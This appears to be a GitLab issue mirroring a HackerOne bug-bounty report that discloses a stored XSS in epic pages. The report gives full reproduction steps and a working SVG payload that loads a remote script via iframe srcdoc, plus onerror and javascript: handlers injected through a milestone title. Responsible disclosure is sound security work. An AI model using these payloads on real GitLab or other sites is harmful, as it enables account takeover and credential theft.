Skip to content

Stored XSS in epic's pages

HackerOne report #1055814 by mike12 on 2020-12-10, assigned to @rchan-gitlab:

Report | Attachments | How To Reproduce

Report

Hi Gitlab!

It's possible to inject arbitrary JS code into an epic's page using the Start date and Due date.

This XSS works for:

  1. gitlab.com using Firefox (tested in Firefox 83.0)
  2. A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1), Chrome (tested in Chrome 87.0.4280.88) or Firefox
Steps to reproduce using Firefox

  1. Open your browser and navigate to https://gitlab.com

  2. Create a group and a project in it

  3. Add a file named demo.svg to the project with the following content:

    <svg id="x"  
     xmlns="http://www.w3.org/2000/svg"  
     width="100"  
     height="100"  
>  
    <foreignObject>  
        <iframe xmlns="http://www.w3.org/1999/xhtml"  
                srcdoc='<script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js> </script>'></iframe>  
    </foreignObject>

    <image href="foo" onerror="alert('onerror')"/>

    <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert('xlink:href')">  
        <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/>  
        <text x="50%" y="50%" text-anchor="middle" stroke="#000000" stroke-width="1px" dy=".3em">Click me</text>  
    </a>  
</svg>

  4. Create a new epic in the group

  5. Create a new issue in the project

  6. Assign the created epic to the issue

  7. Create a new milestone in the project

    1. Title: <svg width="100"><use xlink:href="/<YOUR-GROUP-NAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg> (Replace <YOUR-GROUP-NAME> and <YOUR-PROJECT> with your values)
    2. Specify any valid Start Date and Due Date values

  8. Assign the created milestone to the issue

  9. Navigate to the epic created in step 4

  10. Hover your mouse over the inherited due date

1.png

Steps to reproduce using Safari
  1. Run a self-hosted Gitlab instance
  2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
Steps to reproduce using Chrome
  1. Run a self-hosted Gitlab instance
  2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
  3. Click the red circle in the due date tooltip.

2.png

3.png

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data, including credentials

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: